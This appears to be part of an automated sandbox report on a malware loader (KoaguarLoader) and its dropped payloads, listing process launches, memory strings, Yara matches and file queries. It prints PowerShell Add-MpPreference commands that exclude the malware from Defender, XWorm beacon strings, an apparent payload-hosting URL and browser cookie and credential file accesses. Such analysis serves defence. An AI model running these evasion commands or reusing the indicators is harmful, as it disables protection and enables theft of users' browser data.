                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'Jump to behavior
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004478000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004A42000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004271000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager'
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.000000000287E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: {"adm":"true","bld":"GYUdvZaEZRGFsyjjc4Z4","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"4UM_3KAGS","mem":4,"pcn":"813435","uname":"user-PC\\user","version":"0.22.0","win":"Program Manager","winv":"Microsoft Windows 10 Pro"}
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000276C000.00000004.00001000.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.000000000287E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: {"adm":"true","bld":"GYUdvZaEZRGFsyjjc4Z4","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"4UM_3KAGS","mem":4,"pcn":"813435","uname":"user-PC\\user","version":"0.22.0","win":"Program Manager","winv":"Microsoft Windows 10 Pro"}{"adm":"true","bld":"GYUdvZaEZRGFsyjjc4Z4","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"4UM_3KAGS","mem":4,"pcn":"813435","uname":"user-PC\\user","version":"0.22.0","win":"Program Manager","winv":"Microsoft Windows 10 Pro"}
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingC:\Users\user\AppData\RoamingProgram ManagerTue, 11 Mar 2025 16:11:44 GMTTue, 11 Mar 2025 16:11:45 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:11:54 GMTTue, 11 Mar 2025 16:11:55 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:24 GMTProgram ManagerTue, 11 Mar 2025 16:12:28 GMTProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:34 GMTTue, 11 Mar 2025 16:12:38 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:13:02 GMTProgram ManagerProgram ManagerProgram Manager
                        Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ~Program Manager
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004A42000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BfProgram Manager
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000043B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0iknzArd8%2BXL5rTCiJhOqJPjYGpixphX1XGPd1rentd5IXA05Dam8QRosb{"1":"5","2":"f6ef22dd17e317c8a968f74f07647597","3":"Program Manager","4":"1"}
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002744000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *struct { Caption string }Microsoft Windows 10 ProConnectServerProgram Manager2.5.29.14Actalis S.p.A./03358520967Actalis Authentication Root CAActalis S.p.A./03358520967Actalis Authentication Root CA2.5.29.142.5.29.192.5.29.352.5.29.15
                        Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004478000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BpProgram Manager
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\UsersC:\Users\user\AppDataC:\Users\user\AppData\User Data\Default\C:\Users\user\AppDataC:\Users"Program Manager"https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec5447d9e24f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec548928134f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec54c5d8e74f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/etext/html; charset=UTF-891ec54f97e7e4f0b-EWR.exeh3=":443"; ma=86400exetext/html; charset=UTF-891ec54fa8a074f0b-EWRxeh3=":443"; ma=86400ehttps://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec55029c064f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec55424a434f0b-EWRexeh3=":443"; ma=86400.exehttps://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec55ebfc3a4f0b-EWRxeh3=":443"; ma=86400exehttps://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec5601fe324f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec566b09e04f0b-EWR.exeh3=":443"; ma=86400k.exetext/html; charset=UTF-891ec5675c9e94f0b-EWRh3=":443"; ma=86400text/html; charset=UTF-891ec567e5acc4f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec568db8804f0b-EWRexeh3=":443"; ma=86400zxwkrwzjoeqao5.exezxwkrwzjoeqao5.exelkyqv1ukn0ennan.exelkyqv1ukn0ennan.exelkyqv1ukn0ennan.exef2xntpvi0dy0fbglkx.exef2xntpvi0dy0fbglkx.exef2xntpvi0dy0fbglkx.execyskkh9wolepexyami.execyskkh9wolepexyami.execyskkh9wolepexyami.exem7jjcgb7sci7nna.exem7jjcgb7sci7nna.exem7jjcgb7sci7nna.execyzytdpfouuagfocjhbx.execyzytdpfouuagfocjhbx.execyzytdpfouuagfocjhbx.exetkttcxb4zlkfbwtxr1.exetkttcxb4zlkfbwtxr1.exetkttcxb4zlkfbwtxr1.exedgfbnvr33yvx3tqj2dp.exedgfbnvr33yvx3tqj2dp.exedgfbnvr33yvx3tqj2dp.exei1y524i4zau1n3u.exei1y524i4zau1n3u.exei1y524i4zau1n3u.exetxovwmhxxt1dh.exetxovwmhxxt1dh.exetxovwmhxxt1dh.exe6yxsty9urss228c.exe6yxsty9urss228c.exe6yxsty9urss228c.exems57nieykmo51kmht.exems57nieykmo51kmht.exems57nieykmo51kmht.exexspxw2cv55kanvq.exexspxw2cv55kanvq.exexspxw2cv55kanvq.exe0g45rkcgbvvmesl8e.exe0g45rkcgbvvmesl8e.exe0g45rkcgbvvmesl8e.exeqbfbbnpzwngo5.exeqbfbbnpzwngo5.exeqbfbbnpzwngo5.exerc4yj5vypv0cpj.exerc4yj5vypv0cpj.exerc4yj5vypv0cpj.exewig9hssolbio57yzzwu.exewig9hssolbio57yzzwu.exewig9hssolbio57yzzwu.exe2w3u50f2jchiglwugk.exe2w3u50f2jchiglwugk.exe2w3u50f2jchiglwugk.exegkl1ydgxonxhlag.exegkl1ydgxonxhlag.exegkl1ydgxonxhlag.execpyfha5hqswiqzfh.execpyfha5hqswiqzfh.execpyfha5hqswiqzfh.exexvs4mltpvi9wudpvucs.exexvs4mltpvi9wudpvucs.exexvs4mltpvi9wudpvucs.exenmhryelgdiobyldwqnw.exenmhryelgdiobyldwqnw.exenmhryelgdiobyldwqnw.exedqk
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "Program Manager"
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BlProgram Managerl
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004A42000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BoProgram Manager
                        Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000043B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: [Tue, 11 Mar 2025 16:12:03 GMTProgram ManagerTue, 11 Mar 2025 16:12:04 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:19 GMTProgram Manager
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BjProgram Manager
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000004478000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program ManagerTue, 11 Mar 2025 16:11:42 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:11:53 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:03 GMTProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:11 GMTTue, 11 Mar 2025 16:12:11 GMTProgram ManagerTue, 11 Mar 2025 16:12:13 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:23 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:50 GMTTue, 11 Mar 2025 16:12:53 GMTProgram ManagerProgram ManagerTue, 11 Mar 2025 16:13:10 GMTTue, 11 Mar 2025 16:13:12 GMTTue, 11 Mar 2025 16:13:13 GMTTue, 11 Mar 2025 16:13:16 GMT
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000043B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0iknzArd8%2BXL5rTCiJhOqJPjYGpixphX1XGPd1rentd5IXA05Dam8QRosb{"1":"5","2":"f6ef22dd17e317c8a968f74f07647597","3":"Program Manager","4":"1"}
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000043B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:36 GMTProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:45 GMTProgram ManagerProgram ManagerTue, 11 Mar 2025 16:12:48 GMTProgram ManagerTue, 11 Mar 2025 16:12:51 GMTProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerProgram ManagerTue, 11 Mar 2025 16:13:08 GMTTue, 11 Mar 2025 16:13:09 GMTProgram ManagerProgram ManagerProgram Manager
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: tls13 quic ivtext/html; charset=UTF-891ec54c828384f0b-EWRh3=":443"; ma=86400"Program Manager"https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec54d11ad34f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec552eec184f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec55982e1e4f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec55cd3b7c4f0b-EWRh3=":443"; ma=86400text/html; charset=UTF-891ec55e368074f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html; charset=UTF-891ec55f6ab264f0b-EWRh3=":443"; ma=86400text/html; charset=UTF-891ec565dfb114f0b-EWRh3=":443"; ma=86400text/html; charset=UTF-891ec5666ed934f0b-EWRh3=":443"; ma=86400https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000276C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetWindowTextWProgram Managertruetrue"813435"'
                        Source: svhost.exe, 00000003.00000002.2138122248.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000020AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BiProgram Manager

                        Language, Device and Operating System Detection

                        barindex
                        Yara detected Telegram Recon
                        Source: Yara matchFile source: KoaguarLoader.exe, type: SAMPLE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeQueries volume information: C:\Program Files (x86) VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svhost.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser VolumeInformation
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeQueries volume information: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe VolumeInformation
